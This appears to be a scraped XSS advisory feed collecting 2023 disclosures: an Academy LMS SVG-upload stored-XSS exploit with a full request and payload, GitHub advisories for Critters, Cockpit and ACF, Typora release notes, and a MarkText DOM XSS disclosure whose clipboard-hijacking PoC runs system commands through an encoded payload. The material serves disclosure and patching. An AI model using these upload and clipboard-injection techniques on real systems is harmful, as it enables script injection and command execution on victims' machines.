Academy LMS version 6.1 suffers from an upload vulnerability that could lead to persistent cross site scripting attacks.

    # Exploit Title: Academy LMS 6.1 - Arbitrary File Upload# Exploit Author: CraCkEr# Date: 05/08/2023# Vendor: Creativeitem# Vendor Homepage: https://academylms.net/# Software Link: https://demo.academylms.net/# Tested on: Windows 10 Pro# Impact: Allows User to upload files to the web server# CWE: CWE-79 - CWE-74 - CWE-707## DescriptionAllows Attacker to upload malicious files onto the server, such as Stored XSS## Steps to Reproduce:1. Login as a [Normal User]2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings3. Upload any Image into the [avatar]4. Capture the POST Request with [Burp Proxy Intercept]5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS] -----------------------------------------------------------POST /wp-admin/async-upload.php HTTP/2-----------------------------------------------------------Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  <script type="text/javascript">    alert("XSS by CraCkEr");  </script></svg>-----------------------------------------------------------6. Send the Request7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg[-] Done

Academy LMS 6.1 Cross Site Scripting / File Upload

Critters versions 0.0.17-0.0.19 have an issue when parsing the HTML, which leads to a potential cross-site scripting (XSS) bug. We recommend upgrading to version 0.0.20 of the extension. 

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Package**

npm critters (npm)

**Affected versions**

0.0.17-0.0.19

**Description**

**Impact**

Critters version 0.0.17-0.0.19 have an issue when parsing the HTML which leads to a potential cross-site scripting (XSS) bug.

**Patches**

The bug has been fixed in v0.0.20.

**Workarounds**

Upgrading Critters version to >0.0.20 is the easiest fix. This is a non breaking version upgrade so we recommend all users to use v0.0.20.

CVE-2023-3481: Critical CSS inlining XSS Vulnerability Advisory

Cross-site Scripting (XSS) - Reflected in GitHub repository pimcore/pimcore prior to 10.6.8.

CVE-2023-4453

Cross-site scripting vulnerability in Advanced Custom Fields versions 6.1.0 to 6.1.7 and Advanced Custom Fields Pro versions 6.1.0 to 6.1.7 allows a remote authenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product with the administrative privilege.

CVE-2023-40068: Advanced Custom Fields (ACF)

Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit version 2.6.3 and prior. A patch is available at commit 30609466c817e39f9de1871559603e93cd4d0d0c and anticipated to be part of version 2.6.4.

**Cockpit Cross-site Scripting vulnerability**

Moderate severity GitHub Reviewed Published Aug 20, 2023 to the GitHub Advisory Database • Updated Aug 21, 2023

GHSA-g3mv-64h3-h482: Cockpit Cross-site Scripting vulnerability

Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.

CVE-2023-4451

DOM-based XSS in updater/update.html in Typora before 1.6.7 on Windows and Linux allows a crafted markdown file to run arbitrary JavaScript code in the context of Typora main window via loading typora://app/typemark/updater/update.html in <embed> tag. This vulnerability can be exploited if a user opens a malicious markdown file in Typora, or copies text from a malicious webpage and paste it into Typora.

> From this version, Windows 7, 8, 8.1 are no longer supported. For older Windows support, please check here.

**“Files” Section in Preferences Panel**

In this version, we rearranged groups in Preferences Panel, and added a new group “Files” in Preferences Panel for files related configs.

Some new options are added:

1.  Typora now allow user to set default file extensions when save file or add new file in files sidebar.
2.  Typora now allow user to config actions when drop file or folders into Typora, currently it provides following two options:
    *   Open or import the file / folder in Typora
    *   Insert a file link into Typora

**Options to Disable Auto Links**

You can now config whether Typora should auto recognize and render links from Preferences Panel → Markdown → Syntax Support.

*   When **Auto Links is disabled**, links like https://typora.io or mailto:[email protected] in the markdown document will NOT rendered as <ttps://typora.io> or \[email protected\].
    
    But you can use syntax like [title](url) or <url> to insert links.
    
*   When **Auto Links is enabled**, links like https://typora.io or mailto:[email protected] in the markdown document will rendered as <ttps://typora.io> or \[email protected\] automatically.
    

**Default Code Language**

You can now set default code language for code blocks from Preferences Panel → Code Fences.

And Typora provides some apply options:

*   Apply default code language when add code fences from menubar, context menu, or from shortcut keys.
*   Apply default code language when add code fences by input markdown syntax ```. You can press **Backspace** key or **Undo** to delete auto applied code language.
*   Apply in both cases.

Auto Apply Code Language for Code Blocks inserted from menu

Auto Apply Code Language for Code Blocks inserted from Markdown

You can also choose **Last Used** to auto apply last used code language when insert new code blocks.

**Timeline Diagram**

Typora now upgrade mermaid library to version 10, and timeline diagram is now supported.

We also added a link for diagram configurations in Preferences Panel → Markdown → Syntax Support → Diagrams.

**Other Changes****Thai Language Support**

Typora now speaks Thai, thanks to ARMnunf!

**PicList as an Image Uploader**

Typora now added PicList as an image uploader service. See here for more details.

**Other Improvements**

*   Add PEG.js syntax highlight support.

**Privacy & Security Updates**

*   Fix CVE-2023-2317
*   Fix CVE-2023-2316
*   Avoid using google font mirrors in exported HTML, now official google font CDN is used.

**Bug Fix**

*   Fix using keyword["keyword"] sometimes causes node not rendered in Mermaid diagram.
*   Fix color of typic package not readable in dark themes.
*   Fix setting inline mermaid configs may also affect other mermaid blocks.
*   Fix tasks status cannot be changed from menu bar when task list is under nested lists.
*   Fix math block is always auto numbered in exported docx and related setting is ignored.
*   \[Spec change\] Typora now allow users to escape : mark to avoid input unwanted emoji codes.

**Notice for Windows**

From this version, Windows 7, 8, 8.1 are no longer supported.

For older Windows support, please check here.

CVE-2023-2317: Typora 1.6

DOM-based XSS in src/muya/lib/contentState/pasteCtrl.js in MarkText 0.17.1 and before on Windows, Linux and macOS allows arbitrary JavaScript code to run in the context of MarkText main window. This vulnerability can be exploited if a user copies text from a malicious webpage and paste it into MarkText.

**Summary:**

There is a DOM-based XSS in MarkText allowing arbitrary JavaScript code to run in the context of MarkText main window. This vulnerability can be exploited if a user copies text from a malicious webpage and paste it into MarkText.

**Vulnerability Details:**

When the user performs paste operations, MarkText will check the clipboard data and try to convert HTML tags into the equivalent Markdown format, and then generate HTML again for markdown preview.

Specifically, when the user copies a link from a webpage and paste it into MarkText, the <a> tag will be processed by the following code in src/muya/lib/contentState/pasteCtrl.js:

const links \= Array.from(tempWrapper.querySelectorAll('a'))
for (const link of links) {
  const href \= link.getAttribute('href')
  const text \= link.textContent   // \[1\]
  if (URL\_REG.test(href) && href \=== text) {
    const title \= await getPageTitle(href)
    if (title) {
      link.innerHTML \= sanitize(title, PREVIEW\_DOMPURIFY\_CONFIG, true)
    } else {
      const span \= document.createElement('span')   // \[2\]
      span.innerHTML \= text   // \[3\]
      link.replaceWith(span)
    }
  }
}

This code iterates over all the <a> tags. For each tag, if its href attribute is the same as its textContent, MarkText will try to fetch the URL and extract title from the response, then assign to innerHTML after sanitization.

However, if the title cannot be found, MarkText will create a <span> element at [2] and assign textContent of the original <a> tag to innerHTML at [3] without any sanitization, which results in DOM-based XSS.

This should affect all platforms since MarkText is built on Electron. Tested on:

*   MarkText 0.17.1 for Windows
*   MarkText 0.17.1 for Linux

**Proof-of-Concept:**

An attacker can craft a malicious webpage and hook on the copy event with the following code:

<script\>
  document.addEventListener('copy',e\=>{
    e.preventDefault();
    let payload \= '';
    if(navigator.platform \=== 'Win32') {
      payload \= decodeURIComponent(atob('JTVCJUUyJTgwJUFBJTVEKCUzQ2ElMjBocmVmJTNEJTIyaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW01dmRHVndZV1FnUXpwY1hIZHBibVJ2ZDNOY1hIZHBiaTVwYm1raUtRJTNEJTNEJykpJTI2JTIzeDNlJTNCJTIyJTNFaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW01dmRHVndZV1FnUXpwY1hIZHBibVJ2ZDNOY1hIZHBiaTVwYm1raUtRJTNEJTNEJykpJTI2JTIzeDNlJTNCJTNDJTJGYSUzRSk='));
    } else {
      payload \= decodeURIComponent(atob('JTVCJUUyJTgwJUFBJTVEKCUzQ2ElMjBocmVmJTNEJTIyaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW1kdWIyMWxMV05oYkdOMWJHRjBiM0lnTFdVZ0owMWhjbXRVWlhoMElGSkRSU0JRYjBNbklpayUzRCcpKSUyNiUyM3gzZSUzQiUyMiUzRWh0dHAlM0ElMkYlMkYxJTNBMSUyRiUyMyUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gzZSUzQiUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gyMCUzQm9ubG9hZCUzRGV2YWwoYXRvYignY21WeGRXbHlaU2dpWTJocGJHUmZjSEp2WTJWemN5SXBMbVY0WldNb0ltZHViMjFsTFdOaGJHTjFiR0YwYjNJZ0xXVWdKMDFoY210VVpYaDBJRkpEUlNCUWIwTW5JaWslM0QnKSklMjYlMjN4M2UlM0IlM0MlMkZhJTNFKQ=='))
    }
    e.clipboardData.setData('text/html', payload + window.getSelection());
  })
</script\>

The base64-encoded part in the PoC is decoded to the following content:

require("child\_process").exec("gnome-calculator -e 'MarkText RCE PoC'")

When the victim copies text from this page, the payload is added to the copied content and will be triggered when it is pasted into MarkText. This PoC will run system command notepad on Windows, or gnome-calculator on Linux.

Here are GIFs demonstrating the PoC on Windows and Ubuntu:

A live version of the PoC can be found here.

**Suggested Mitigations:**

It is recommended to sanitize untrusted data before assigning it to innerHTML.

For end users who are using the versions affected by this vulnerability, it is suggested to avoid copying text from an untrusted webpage then paste it into MarkText.

**Credits:**

Li Jiantao (@CurseRed) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Vulnerability Disclosure:**

As STAR Labs is a CVE Numbering Authority (CNA), the following CVE identifiers are reserved by STAR Labs to track the vulnerabilities presented in this report:

1.  **CVE-2023-2318**  
    DOM-Based Cross-site Scripting (XSS) in src/muya/lib/contentState/pasteCtrl.js in MarkText 0.17.1 allows attackers to run arbitrary JavaScript code and execute system commands by convincing the victim to copy text from a crafted webpage and paste it into MarkText.

STAR Labs requests that MarkText use the above reserved CVE identifiers when referencing the vulnerabilities presented in this report instead of requesting for new CVE identifiers (e.g. via MITRE or GitHub Security Advisory) to prevent having duplicate CVE records.

CVE-2023-2318: Security Issue: DOM-Based XSS leading to RCE · Issue #3618 · marktext/marktext

Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit version 2.6.3 and prior. A patch is available at commit 2a93d391fbd2dd9e730f65d43b29beb65903d195 and anticipated to be part of version 2.6.4.

**Cockpit Cross-site Scripting vulnerability**

High severity GitHub Reviewed Published Aug 19, 2023 to the GitHub Advisory Database • Updated Aug 21, 2023

GHSA-rmgx-3w4r-xcfp: Cockpit Cross-site Scripting vulnerability

Cross-site Scripting (XSS) - Stored in GitHub repository cockpit-hq/cockpit version 2.6.3 and prior. A patch is available at commit 36d1d4d256cbbab028342ba10cc493e5c119172c and anticipated to be part of version 2.6.4.

Tag

#xss